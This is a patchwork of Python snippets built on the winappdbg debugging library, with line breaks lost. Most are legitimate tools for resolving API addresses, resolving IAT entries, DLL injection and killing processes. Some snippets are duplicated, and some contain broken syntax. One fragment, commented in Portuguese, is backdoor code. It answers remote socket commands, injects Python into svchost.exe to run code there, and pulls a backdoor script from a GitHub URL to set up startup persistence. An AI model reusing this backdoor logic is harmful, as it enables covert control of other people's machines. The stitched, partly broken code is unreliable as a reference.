def print_api_address(pid, modName, procName): # Request debug privileges. System.request_debug_privileges() # Instance a Process object. process = Process(pid) # Lookup it's modules. process.scan_modules() # Get the module. module = process.get_module_by_name(modName) if not module: print "Module not found: %s" % modName return # Resolve the requested API function address. address = module.resolve(procName) # Print the address. if address: print "%s!%s == 0x%.08x" % (modName, procName, address) else: print "Could not resolve %s in module %s" % (procName, modName)
def print_api_address( pid, modName, procName ): # Request debug privileges. System.request_debug_privileges() # Instance a Process object. process = Process( pid ) # Lookup it's modules. process.scan_modules() # Get the module. module = process.get_module_by_name( modName ) if not module: print "Module not found: %s" % modName return # Resolve the requested API function address. address = module.resolve( procName ) # Print the address. if address: print "%s!%s == 0x%.08x" % ( modName, procName, address ) else: print "Could not resolve %s in module %s" % (procName, modName)
def print_label(pid, address): # Request debug privileges. System.request_debug_privileges() # Instance a Process object. process = Process(pid) # Lookup it's modules. process.scan_modules() # Resolve the requested label address. label = process.get_label_at_address(address) # Print the label. print("%s == 0x%.08x" % (label, address))
def print_label_address( pid, label ): # Request debug privileges. System.request_debug_privileges() # Instance a Process object. process = Process( pid ) # Lookup it's modules. process.scan_modules() # Resolve the requested label address. address = process.resolve_label( label ) # Print the address. print "%s == 0x%.08x" % ( label, address )
def reslove_iat_pointers(pid, iat_ptrs): """Use winappdbg to resolve IAT pointers to their respective module and function names @param pid: process ID to connect to @param iat_ptrs: list of pointer addresses to be resolved """ ###################################################################### # # Attach to process and start using winappdbg # ###################################################################### # Request debug privileges. System.request_debug_privileges() # Attach to process process = Process(pid) # Lookup the process modules. process.scan_modules() # imp_table[ <funct_pointer> ] = [ <module_name>, <function_name> ] imp_table = {} for iat_ptr in iat_ptrs: # For each iat pointer get the function name as a label populated by winappdbg label = process.get_label_at_address(process.peek_dword(iat_ptr)) module,function,offset = Process.split_label_strict(label) # Only add functions that have valid labels if function != None: imp_table[iat_ptr] = [module, function] assert len(imp_table) != 0, "Unable to find imports in code!" ###################################################################### # # Because we may have missed some IAT pointers with our scanner we # are going to attempt to locate the full mapped IAT directory in the # section then enumerate ever pointer in the directory. And use that # list instead. # ###################################################################### imp_table_new={} for iat_ptr in range(min(imp_table.keys()), max(imp_table.keys())+4, 4): # Resolve the requested label address. label = process.get_label_at_address(process.peek_dword(iat_ptr)) module,function,offset = Process.split_label_strict(label) if function != None: imp_table_new[iat_ptr] = [module, function] return imp_table_new
def main(): print "Process DLL injector" print "by Mario Vilas (mvilas at gmail.com)" print if len(sys.argv) != 3: script = os.path.basename(sys.argv[0]) print "Injects a DLL into a running process." print " %s <pid> <library.dll>" % script print " %s <process.exe> <library.dll>" % script return System.request_debug_privileges() try: pid = HexInput.integer(sys.argv[1]) except Exception: s = System() s.scan_processes() pl = s.find_processes_by_filename(sys.argv[1]) if not pl: print "Process not found: %s" % sys.argv[1] return if len(pl) > 1: print "Multiple processes found for %s" % sys.argv[1] for p,n in pl: print "\t%12d: %s" % (p,n) return pid = pl[0][0].get_pid() print "Using PID %d (0x%x)" % (pid, pid) dll = sys.argv[2] print "Using DLL %s" % dll p = Process(pid) b = p.get_bits() if b != System.bits: print ( "Cannot inject into a %d bit process from a %d bit Python VM!" % (b, System.bits) ) return p.scan_modules() p.inject_dll(dll)
def main(): print("Process DLL injector") print("by Mario Vilas (mvilas at gmail.com)") print if len(sys.argv) != 3: script = os.path.basename(sys.argv[0]) print("Injects a DLL into a running process.") print(" %s <pid> <library.dll>" % script) print(" %s <process.exe> <library.dll>" % script) return System.request_debug_privileges() try: pid = HexInput.integer(sys.argv[1]) except Exception: s = System() s.scan_processes() pl = s.find_processes_by_filename(sys.argv[1]) if not pl: print("Process not found: %s" % sys.argv[1]) return if len(pl) > 1: print("Multiple processes found for %s" % sys.argv[1]) for p,n in pl: print("\t%12d: %s" % (p,n)) return pid = pl[0][0].get_pid() print("Using PID %d (0x%x)" % (pid, pid)) dll = sys.argv[2] print("Using DLL %s" % dll) p = Process(pid) b = p.get_bits() if b != System.bits: print(() "Cannot inject into a %d bit process from a %d bit Python VM!" % (b, System.bits) ) return p.scan_modules() p.inject_dll(dll)
def print_label_address(pid, label): # Request debug privileges. System.request_debug_privileges() # Instance a Process object. process = Process(pid) # Lookup it's modules. process.scan_modules() # Resolve the requested label address. address = process.resolve_label(label) # titles = [i for i in process.search("Trying to change notepad text\0")] # msg = [k for k in 'New text here ! \0'] # for i in range(len(msg)): # process.poke(46859072 + i * 2, msg[i].encode()) # Print the address. print("%s == 0x%.08x" % (label, address))
process.close_handle() except WindowsError, e: print "Warning: call to CloseHandle() failed: %s" % str(e) except WindowsError, e: print "Warning: call to TerminateProcess() failed: %s" % str(e) except WindowsError, e: print "Warning: call to OpenProcess() failed: %s" % str(e) targets = next_targets # Try to terminate processes by injecting a call to ExitProcess(). next_targets = list() for pid in targets: next_targets.append(pid) try: process = Process(pid) process.scan_modules() try: module = process.get_module_by_name('kernel32') pExitProcess = module.resolve('ExitProcess') try: process.start_thread(pExitProcess, -1) next_targets.pop() count += 1 print "Forced process %d exit" % pid except WindowsError, e: print "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e)) except WindowsError, e: print "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e)) except WindowsError, e: print "Warning: scanning for loaded modules failed %d: %s" % (pid, str(e)) targets = next_targets
if dados.startswith("pwd"): s.send("\n"+str(os.getcwd)+"\n") if os.name == 'nt': try: # Injetando codigo python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor) python_dll = ctypes.util.find_library(python_lib) s = System() s.scan_processes() pl = s.find_processes_by_filename("svchost.exe") pid = pl[0][0].get_pid() p = Process(pid) print('pid', pid) print('arch', p.get_bits()) t = p.inject_dll(python_dll) p.scan_modules() m = p.get_module_by_name(python_lib) init = m.resolve("Py_InitializeEx") pyrun = m.resolve("PyRun_SimpleString") print(init, pyrun) p.start_thread(init, 0) time.sleep(0.1) sh = 'import subprocess; subprocess.call("svchost.exe")' addr = p.malloc(len(sh)) p.write(addr, sh) p.start_thread(pyrun, addr) # Movendo o backdoor pro startup if dados.startswith("move_startup"): url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py" user = getpass.getuser()
def main(argv): script = os.path.basename(argv[0]) params = argv[1:] print("Process killer") print("by Mario Vilas (mvilas at gmail.com)") print if len(params) == 0 or '-h' in params or '--help' in params or \ '/?' in params: print("Usage:") print(" %s <process ID or name> [process ID or name...]" % script) print print( "If a process name is given instead of an ID all matching processes are killed." ) exit() # Scan for active processes. # This is needed both to translate names to IDs, and to validate the user-supplied IDs. s = System() s.request_debug_privileges() s.scan_processes() # Parse the command line. # Each ID is validated against the list of active processes. # Each name is translated to an ID. # On error, the program stops before killing any process at all. targets = set() for token in params: try: pid = HexInput.integer(token) except ValueError: pid = None if pid is None: matched = s.find_processes_by_filename(token) if not matched: print("Error: process not found: %s" % token) exit() for (process, name) in matched: targets.add(process.get_pid()) else: if not s.has_process(pid): print("Error: process not found: 0x%x (%d)" % (pid, pid)) exit() targets.add(pid) targets = list(targets) targets.sort() count = 0 # Try to terminate the processes using the TerminateProcess() API. next_targets = list() for pid in targets: next_targets.append(pid) try: # Note we don't really need to call open_handle and close_handle, # but it's good to know exactly which API call it was that failed. process = Process(pid) process.open_handle() try: process.kill(-1) next_targets.pop() count += 1 print("Terminated process %d" % pid) try: process.close_handle() except WindowsError as e: print("Warning: call to CloseHandle() failed: %s" % str(e)) except WindowsError as e: print("Warning: call to TerminateProcess() failed: %s" % str(e)) except WindowsError as e: print("Warning: call to OpenProcess() failed: %s" % str(e)) targets = next_targets # Try to terminate processes by injecting a call to ExitProcess(). next_targets = list() for pid in targets: next_targets.append(pid) try: process = Process(pid) process.scan_modules() try: module = process.get_module_by_name('kernel32') pExitProcess = module.resolve('ExitProcess') try: process.start_thread(pExitProcess, -1) next_targets.pop() count += 1 print("Forced process %d exit" % pid) except WindowsError as e: print( "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e))) except WindowsError as e: print( "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e))) except WindowsError as e: print("Warning: scanning for loaded modules failed %d: %s" % (pid, str(e))) targets = next_targets # Attach to every process. # print(a message on error, but don't stop.) next_targets = list() for pid in targets: try: win32.DebugActiveProcess(pid) count += 1 print("Attached to process %d" % pid) except WindowsError as e: next_targets.append(pid) print("Warning: error attaching to %d: %s" % (pid, str(e))) targets = next_targets # Try to call the DebugSetProcessKillOnExit() API. # # Since it's defined only for Windows XP and above, # on earlier versions we just ignore the error, # since the default behavior on those platforms is # already what we wanted. # # This must be done after attaching to at least one process. # # http://msdn.microsoft.com/en-us/library/ms679307(VS.85).aspx try: win32.DebugSetProcessKillOnExit(True) except AttributeError: pass except WindowsError as e: print("Warning: call to DebugSetProcessKillOnExit() failed: %s" % str(e)) if count == 0: print("Failed! No process was killed.") elif count == 1: print("Successfully killed 1 process.") else: print("Successfully killed %d processes." % count) # Exit the current thread. # This will kill all the processes we have attached to. exit()